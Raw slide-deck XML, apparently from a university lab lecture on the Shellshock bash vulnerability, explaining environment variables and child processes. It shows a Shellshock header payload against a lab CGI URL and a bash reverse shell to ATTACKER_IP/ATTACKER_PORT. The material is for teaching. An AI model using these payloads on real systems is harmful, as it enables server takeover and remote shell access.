            <a:ext cx="9252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Ideally, we want to get control of this webserver. Maybe we can get a root shell?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A32CA-4684-4E2A-EBCE-7F34958E4632}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2057400"/>
            <a:ext cx="8111516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 –A "() { echo :;}; echo;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”[URL]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3EF8B-9932-BBB2-B561-B3DAD894D5DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="2539385"/>
            <a:ext cx="86868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[URL]  =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http://www.seedlab-shellshock.com/cgi-bin/vul.cgi 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6EF2CD-EF75-08B3-8C16-7DB4D51EC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3406"/>
            <a:ext cx="12192000" cy="3911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8D226D-4374-402D-3325-41C12518642F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="3682773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not work…… or does it?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33AC1D-E136-6E7A-34C2-BB4C527C6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112324"/>
            <a:ext cx="7163779" cy="205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76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22023263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D1EF2-4AE0-4CD0-12A9-4D5834B39BCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1763736" y="4511206"/>
            <a:ext cx="674664" cy="388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ADB02-F967-D3AD-94F0-B6F3560C5A13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8141604" y="4373958"/>
            <a:ext cx="849996" cy="445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294C9-7168-73FA-04E6-AF3BA7685805}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2743201" y="4899410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09ECC-8E77-632B-7774-E13CB772296D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1340644">
            <a:off x="1639401" y="47947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69280-AA10-E8E4-896C-4D998E80AA78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19739728">
            <a:off x="8375808" y="45933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6E19B-89AC-E6D3-31EF-953A41850838}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3278264" y="490364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output to a network connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33344183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6368F-6C50-3ED2-6CCE-08F8CA2EA0F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1143000"/>
            <a:ext cx="888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reverse shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>is a shell, but it redirects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2400" dirty="0"/>
              <a:t> back to our machine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2A7E20A-612B-7372-0C12-36A4A573F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2895600"/>
            <a:ext cx="1956486" cy="2171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D93C958-4820-8046-E2F0-3F9C9A5BD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505200"/>
            <a:ext cx="1792264" cy="129784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D452E6-16EF-2876-961D-A2E15CAD5CD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25908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369239-BFC3-4BB5-316C-4D407014DA10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8001000" y="3048000"/>
            <a:ext cx="0" cy="213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5CEE4A-3972-9C33-0DDC-D4CFCF873F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1905000" y="3429000"/>
            <a:ext cx="533400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626091-1FC0-BD2E-8380-EA3226BD9B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743201" y="3493425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C71503-C31B-BC4B-EEAA-89760F17BCF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8153401" y="3493425"/>
            <a:ext cx="762000" cy="2827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0272AD1-16D1-12E7-BFB6-A4C8FBEF8FAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1340644">
            <a:off x="8186100" y="31944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4A83F0-3B4E-C4AE-EF26-6CE42B8CEB52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19463281">
            <a:off x="1672565" y="33520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B1EB5D-DB8F-20A1-289B-D22ADD203798}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="3048000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input to a network connection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3FC5C5-5748-6416-41B8-A91952D7E661}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8991600" y="5181600"/>
            <a:ext cx="2286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Bash is now listening for input on a network connection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0D1EF2-4AE0-4CD0-12A9-4D5834B39BCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1763736" y="4511206"/>
            <a:ext cx="674664" cy="388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3ADB02-F967-D3AD-94F0-B6F3560C5A13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8141604" y="4373958"/>
            <a:ext cx="849996" cy="4458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1294C9-7168-73FA-04E6-AF3BA7685805}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2743201" y="4899410"/>
            <a:ext cx="510539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3709ECC-8E77-632B-7774-E13CB772296D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1340644">
            <a:off x="1639401" y="479476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69280-AA10-E8E4-896C-4D998E80AA78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19739728">
            <a:off x="8375808" y="459337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6E19B-89AC-E6D3-31EF-953A41850838}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3278264" y="4903643"/>
            <a:ext cx="4275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redirects output to a network connection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479DDA-E5E2-305B-D08A-5AABECE7A2E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19305831">
            <a:off x="1462494" y="3126280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0947F-CF65-7850-B6EB-CC12DD7557A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4722202" y="278828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28B33-3FE6-6B36-4212-2C10F78A2D85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1703425">
            <a:off x="8213003" y="2998144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ls -al</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39145395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E8925B1-792F-F20F-FA54-D8386598A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2555797"/>
            <a:ext cx="318135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1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Recap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A3528-AB37-D6AA-4BB5-C5D0A3C6CF54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="524618"/>
            <a:ext cx="4811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Environment variables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>are a set of key-value pairs that can control the behavior of a process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Each process has a set of environment variables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8821CF-EC79-1204-72C8-51BD0F16867C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="3352800"/>
            <a:ext cx="2286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93FB7C-612C-0DEA-D2BA-4FB37EA0B243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="3352800"/>
            <a:ext cx="2209800" cy="121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EAC482B9-6E4D-7348-35F8-A05CB9E5F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40903"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5943602" y="3339446"/>
          <a:ext cx="615695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8479">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4131990856"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3078479">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2708414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02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/local/bin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13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78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/home/seed/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my_folder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55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/bin/bash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6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“my new variable!”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1483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1EED177-45E5-695D-67E3-E73A44A320E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="594360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define our own environment variables!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FA70E-6E5F-12F3-3D15-2433AD254156}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="5905412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export foo=“my new variable!”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11338270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B98E6-24AC-E219-F364-8DCB49FD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956"/>
            <a:ext cx="12192000" cy="1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69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B98E6-24AC-E219-F364-8DCB49FD4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86956"/>
            <a:ext cx="12192000" cy="109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29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B983B1EA-20A0-2E83-6012-6B420B1C6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04705"/>
            <a:ext cx="10210800" cy="12137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18B06C-7132-2DF5-4D61-7155C76834F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2514600"/>
            <a:ext cx="961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 terminal #2: Craft a payload that creates a reverse shell (back to attacker terminal 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F8C-9C92-D664-312D-7450CFFCD2F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="3024431"/>
            <a:ext cx="114297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–i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-S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/dev/tcp/ATTACKER_IP/ATTACKER_PORT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE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0&lt;&amp;1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE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2BE2E3-D16E-D608-D58F-B679AAD0FCD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="4081609"/>
            <a:ext cx="929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start an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interactive bash shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>on the server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Whose input (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) comes from a TCP connection, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>And whose output (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdout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stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) goes to the same TCP connection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4B5442-022B-CCBD-7299-C2BEBD56B80A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9753600" y="3639295"/>
            <a:ext cx="1524000" cy="93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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  input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05605D-A3BB-A43A-9658-5B3F2D3867B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9753600" y="4898767"/>
            <a:ext cx="1524000" cy="9363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 = stdin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>1 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2 = 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309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DC429B-2EF5-6321-E4AF-64C5BEB576EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="38100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Reverse Shell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C699B-4FA8-BE21-0F0F-F44E36E3590A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="99655"/>
            <a:ext cx="888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reverse shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>is a shell, but it redirects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sz="1600" dirty="0"/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1600" dirty="0"/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sz="1600" dirty="0"/>
              <a:t> back to our machine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EF8C-9C92-D664-312D-7450CFFCD2F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="732366"/>
            <a:ext cx="114297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sv-SE" sz="2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/bin/bash –i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE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2400" b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/dev/tcp/ATTACKER_IP/ATTACKER_PORT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="2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0&lt;&amp;1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE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2&gt;&amp;1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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FEC5D-095A-FB62-DCC4-6B24AECE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7400"/>
            <a:ext cx="12192000" cy="2597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8B5847-C716-B860-6E29-D78A80C89FA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="1371600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The IP and port of our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>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65D3EB0-5ED7-A114-7B62-1B4399FBC4BF}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6336887" y="1751153"/>
              <a:ext cx="1008360" cy="322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65D3EB0-5ED7-A114-7B62-1B4399FBC4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28247" y="1742513"/>
                <a:ext cx="10260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80CC9C-5FE9-C02D-B039-79DF56D653AA}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3492167" y="4288073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80CC9C-5FE9-C02D-B039-79DF56D653A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3527" y="427943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C0FD6F0F-06EC-DC5E-1570-594CBEBBD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2760133"/>
            <a:ext cx="10972800" cy="32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9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5E3687-7573-6A9B-B083-574F1D65589B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="12954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my_program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US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C484A-0466-C598-E538-C34D67AC7A2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924800" y="16764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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1856044" y="654466"/>
              <a:ext cx="5236920" cy="69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404" y="636466"/>
                <a:ext cx="527256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B4D6F38-7995-0352-FBB2-C4943E46F47A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3571084" y="740866"/>
            <a:ext cx="958680" cy="385920"/>
            <a:chOff x="3571084" y="740866"/>
            <a:chExt cx="95868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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3607084" y="740866"/>
                <a:ext cx="215280" cy="38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8444" y="732226"/>
                  <a:ext cx="232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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3571084" y="984946"/>
                <a:ext cx="13716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2084" y="975946"/>
                  <a:ext cx="154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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3735244" y="984226"/>
                <a:ext cx="112320" cy="12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6244" y="975586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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3912364" y="999346"/>
                <a:ext cx="78480" cy="10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3364" y="990706"/>
                  <a:ext cx="96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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4085164" y="851386"/>
                <a:ext cx="360" cy="27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6524" y="842386"/>
                  <a:ext cx="1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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4081204" y="871186"/>
                <a:ext cx="137880" cy="10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2204" y="862186"/>
                  <a:ext cx="155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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4093084" y="988546"/>
                <a:ext cx="115560" cy="12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4084" y="979906"/>
                  <a:ext cx="13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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4289284" y="921946"/>
                <a:ext cx="90360" cy="17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0644" y="913306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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4435804" y="921946"/>
                <a:ext cx="93960" cy="19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7164" y="913306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7" name="Picture 2" descr="👶🏻 Baby: Light Skin Tone Emoji on Apple iOS 10.2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC364560-778F-8CCE-6C07-1313D2D92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48" y="14324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7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5E3687-7573-6A9B-B083-574F1D65589B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="12954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./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>my_program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(child process)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AC484A-0466-C598-E538-C34D67AC7A2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924800" y="16764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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1856044" y="654466"/>
              <a:ext cx="5236920" cy="6973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2A1E6E-8D7D-7341-AC09-D0A1C664F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8044" y="636466"/>
                <a:ext cx="5272560" cy="73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B4D6F38-7995-0352-FBB2-C4943E46F47A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3571084" y="740866"/>
            <a:ext cx="958680" cy="385920"/>
            <a:chOff x="3571084" y="740866"/>
            <a:chExt cx="95868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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3607084" y="740866"/>
                <a:ext cx="215280" cy="3805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A786488-8D27-3408-1133-7CB338F9C85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98084" y="731866"/>
                  <a:ext cx="23292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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3571084" y="984946"/>
                <a:ext cx="13716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6DFA0C-6626-9B3E-4779-DE58FC7927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62108" y="976337"/>
                  <a:ext cx="154754" cy="247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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3735244" y="984226"/>
                <a:ext cx="112320" cy="12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B42E54C-49AF-C651-FD93-1D6FC73656C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726244" y="975226"/>
                  <a:ext cx="129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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3912364" y="999346"/>
                <a:ext cx="78480" cy="109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BB8BAA-7FB5-9E23-D8CA-2A244CD3BC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03405" y="990346"/>
                  <a:ext cx="96039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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4085164" y="851386"/>
                <a:ext cx="360" cy="275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F59B410-DA55-D609-F4B3-5E28DBE94FC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76164" y="842386"/>
                  <a:ext cx="180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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4081204" y="871186"/>
                <a:ext cx="137880" cy="1062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99DD575-C03B-F265-B6AA-4D00D3A71F7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72227" y="862186"/>
                  <a:ext cx="155474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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4093084" y="988546"/>
                <a:ext cx="115560" cy="123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3C25CE-CE6C-B936-D199-D9E31C6D0D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84084" y="979546"/>
                  <a:ext cx="133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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4289284" y="921946"/>
                <a:ext cx="90360" cy="173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71E149E-3D17-944D-EA6C-E1871F642A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80284" y="912946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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4435804" y="921946"/>
                <a:ext cx="93960" cy="19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8E8D42-9C8B-4C9C-2D8D-0B6934B33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26804" y="912946"/>
                  <a:ext cx="111600" cy="21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E8AA865-2141-D3AE-166A-597C350834F3}"/>
                  </a:ext>
                </a:extLst>
